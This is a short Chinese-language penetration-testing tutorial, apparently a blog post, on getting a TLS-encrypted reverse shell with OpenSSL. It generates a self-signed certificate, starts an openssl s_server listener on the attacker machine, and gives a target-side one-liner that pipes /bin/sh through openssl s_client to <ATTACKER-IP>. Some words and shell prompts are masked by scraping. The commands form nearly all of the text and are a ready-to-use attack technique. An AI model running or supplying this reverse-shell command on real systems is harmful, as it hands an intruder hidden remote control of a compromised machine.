利用OpenSSL搭建一个反弹shell
渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用是Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成**,最后再使用它来获取一个反弹shell。
准备
首先我们需要在自己的机器上生成**,这里用kali来演示。
[email protected]# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes启动监听(渗透机器)
openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>反弹shell(目标机器)
最后在目标机器,也就是你所攻破的机器,运行如下命令:
[email protected]#: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s